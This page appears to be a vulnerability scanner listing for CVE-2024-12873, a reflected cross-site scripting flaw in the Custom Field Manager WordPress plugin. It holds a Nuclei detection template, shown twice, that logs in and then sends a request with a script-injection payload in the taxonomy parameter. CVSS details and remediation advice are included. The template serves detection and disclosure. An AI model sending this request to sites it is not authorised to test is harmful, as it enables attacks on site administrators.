Custom Field Manager WordPress - Cross-Site Scripting

CVE-2024-12873

Verified

Description

Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

custom_field_manager

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-12873.yaml

id: CVE-2024-12873

info:
  name: Custom Field Manager WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version with proper sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12873
    cwe-id: CWE-79
    epss-score: 0.0017
    epss-percentile: 0.37769
    cpe: cpe:2.3:a:f1logic:custom_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: f1logic
    product: custom_field_manager
  tags: cve,cve2024,f1logic,custom-field-manager,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=custom-field-manager-customfields&taxonomy=testxss%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, "</script><script>alert(document.domain)</script><script>","custom-field-manager")
        condition: and
# digest: 4a0a00473045022100f7cf953f452489361949ea17f96fc05c3d3d0e815217a1669107f688d54a955302200764fbcff34feb1d658cce9911448b9349a5a894eff5ce629dd1729cad45a1ea:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-12873

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/https://nvd.nist.gov/vuln/detail/CVE-2024-12873

Remediation Steps

Update to the latest version with proper sanitization and escaping.

id: CVE-2024-12873

info:
  name: Custom Field Manager WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Custom Field Manager WordPress plugin through 1.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version with proper sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/3e82d45f-7b8f-424e-a8d7-be64f5acf65e/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12873
    cwe-id: CWE-79
    epss-score: 0.0017
    epss-percentile: 0.37769
    cpe: cpe:2.3:a:f1logic:custom_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: f1logic
    product: custom_field_manager
  tags: cve,cve2024,f1logic,custom-field-manager,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=custom-field-manager-customfields&taxonomy=testxss%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "text/html")
          - contains_all(body, "</script><script>alert(document.domain)</script><script>","custom-field-manager")
        condition: and
# digest: 4a0a00473045022100f7cf953f452489361949ea17f96fc05c3d3d0e815217a1669107f688d54a955302200764fbcff34feb1d658cce9911448b9349a5a894eff5ce629dd1729cad45a1ea:922c64590222798bb761d5b6d8e72950

Custom Field Manager WordPress - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Custom Field Manager WordPress - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps